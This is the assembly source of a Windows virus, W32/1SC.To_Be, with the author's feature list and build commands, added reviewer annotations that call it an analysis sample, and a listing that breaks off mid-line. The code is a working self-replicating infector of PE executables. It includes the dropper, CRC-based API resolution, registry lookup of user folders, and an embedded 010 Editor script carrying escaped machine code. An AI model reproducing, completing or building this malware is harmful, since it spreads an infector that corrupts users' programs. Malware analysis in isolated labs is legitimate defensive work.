comment ;)
W32/1SC.To_Be by roy g biv

some of its features:
- parasitic direct action infector of PE exe (but not looking at suffix)
- infects files when 010 Editor loads them
- last section appender
- uses CRCs instead of API names
- no infect files with data outside of image (eg self-extractors)
- uses Windows 7 compatible method to find kernel address

not a remake this time - 010 Editor script infects PE files!
---
optimisation tip:
Windows appends ".dll" automatically, so this works:
push "cfs"
push esp
call LoadLibraryA
---
to build this thing:
tasm
----
tasm32 /ml /m3 to_be
tlink32 /B:400000 /x to_be,,,import32

Virus section is already writable, so no need to alter section attributes
---
We're in the middle of a phase transition: a butterfly flapping its wings at just the right moment could cause a storm to happen.
-I'm trying to understand-
I'm at a moment in my life-
I don't know where to flap my wings.
(Danny Hillis)
(;

;-----------------------------------------------------------------------------
; NOTE(review): this listing is a self-replicating PE infector (dropper plus an
; embedded 010 Editor script).  Treat it as an analysis sample only: assemble
; and run it solely inside an isolated lab VM with no files you care about.
; The header above is a TASM `comment` block delimited by ';' - do not add a
; semicolon inside it or the block terminates early.
;-----------------------------------------------------------------------------

.486                                    ;bswap - 486 target, presumably for the bswap
                                        ;instruction used in the body (not shown here)
.model flat

extern  LoadLibraryA:proc
extern  MessageBoxA:proc
extern  ExitProcess:proc

;-----------------------------------------------------------------------------
; Everything - code included - is placed in .data so the body is writable
; (the CRC tables below are filled in at run time).  NOTE(review): executing
; from a data section depends on the section being executable; under DEP/NX
; this would fault unless the linker marks it executable - confirm.
;-----------------------------------------------------------------------------
.data

include to_be.inc                       ;supplies the names not defined in this file
                                        ;(codesize, krnnames/regnames, create_crcs,
                                        ;krncrc_count/regcrc_count, peb/ldr offsets) - presumably

calcsize equ 0                          ;set to 1 to display codesize, then search ";replace" below

;-----------------------------------------------------------------------------
; dropper: program entry.  Builds the API CRC tables that the virus body looks
; APIs up by (instead of by name), then falls through into tobe_begin, the
; start of the virus body proper, which directly follows this block.
; Assumes ebx = fs:[30h] (PEB pointer) on entry - the body relies on that.
;-----------------------------------------------------------------------------
dropper label near
if calcsize
        ;codesize build only: render codesize as up to five decimal digits
        ;into a scratch buffer, show it in a message box and exit, so the
        ;value can be pasted into the script1 string ("replace" marker).
        xor     ebx, ebx
        push    ebx                     ;MessageBoxA uType = 0
        push    ebx                     ;MessageBoxA lpCaption = NULL
        call    skip_body               ;return address = the 6-byte buffer below
        db      6 dup (0)               ;up to 99999 bytes (5 digits + NUL terminator)
skip_body label near
        pop     edi                     ;edi -> output buffer
        push    edi                     ;MessageBoxA lpText
        mov     eax, codesize
        cdq                             ;edx:eax = codesize (edx = 0, size is positive)
        mov     ecx, 10000
        div     ecx                     ;eax = ten-thousands digit, edx = remainder
        test    al, al                  ;quotient is < 10 for sizes under 100000, so al suffices
        je      skip_10000              ;suppress a leading zero in the first position only
        add     al, '0'
        stos    byte ptr [edi]
skip_10000 label near
        xchg    edx, eax                ;eax = remainder
        cdq                             ;edx = 0 (remainder is non-negative)
        mov     cx, 1000                ;only cx written: ecx high word is still 0 from 10000 above
        div     ecx
        add     al, '0'
        stos    byte ptr [edi]
        xchg    edx, eax
        cdq
        mov     cx, 100
        div     ecx
        add     al, '0'
        stos    byte ptr [edi]
        xchg    edx, eax
        cdq
        mov     cl, 10                  ;ch is already 0 because cx was 100
        div     ecx
        add     al, '0'
        stos    byte ptr [edi]
        xchg    edx, eax                ;final remainder = units digit
        add     al, '0'
        stos    byte ptr [edi]          ;unused trailing buffer bytes stay 0 -> terminator
        push    ebx                     ;MessageBoxA hWnd = NULL
        call    MessageBoxA
        push    ebx                     ;ExitProcess exit code 0
        call    ExitProcess
endif
        push    ebx                     ;keep the PEB pointer across the create_crcs calls
        mov     edx, krncrc_count       ;entry count of the first table
        mov     ebx, offset krnnames    ;plaintext API names (kernel32 by the prefix - not visible here)
        mov     edi, offset krncrcbegin ;destination: table embedded in the body after parse_exports
        call    create_crcs             ;presumably writes one CRC per name at edi
        mov     edx, regcrc_count
        mov     ebx, offset regnames    ;advapi32 names by the prefix (body loads "advapi32")
        mov     edi, offset regcrcbegin
        call    create_crcs
        pop     ebx
        push    (offset do_message - offset dropper) + 2000h
                                        ;offset of do_message within the body plus 2000h; consumed by
                                        ;the code that follows (tobe_begin) - its meaning is not visible here
        ;falls through into tobe_begin
;----------------------------------------------------------------------------- ;everything before this point is dropper code ;no exception handler this time because I don't care if the .cfg is corrupted ;----------------------------------------------------------------------------- tobe_begin label near push ebx mov eax, dword ptr [ebx + pebLdr] ;ebx = fs:[30h] at start time mov esi, dword ptr [eax + ldrInLoadOrderModuleList] lods dword ptr [esi] xchg esi, eax lods dword ptr [esi] mov ebx, dword ptr [eax + mlDllBase] call parse_exports ;----------------------------------------------------------------------------- ;API CRC table, null terminated ;----------------------------------------------------------------------------- krncrcbegin label near dd (krncrc_count + 1) dup (0) krncrcend label near call load_reg db "advapi32", 0 reg_key db "Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders", 0 personal db "Personal", 0 script1 db "int a=2514" ;replace this with codesize db ",c=FileSize(),d,f,g,h,i,j,k,l;char b[a]=", 22h, "hrgb!\xE8\xFF\xFF\xFF\xFF\xC0^\x83\xC62\x8B\xFE\xADj\x4Y\xC1\xC0\b<0s\x5,C\xC0\xE8\x2\x4\x4IHXS" script2 db 22h, ",e[96];if(c>64){d=ReadInt(60);if(d+96=k&&l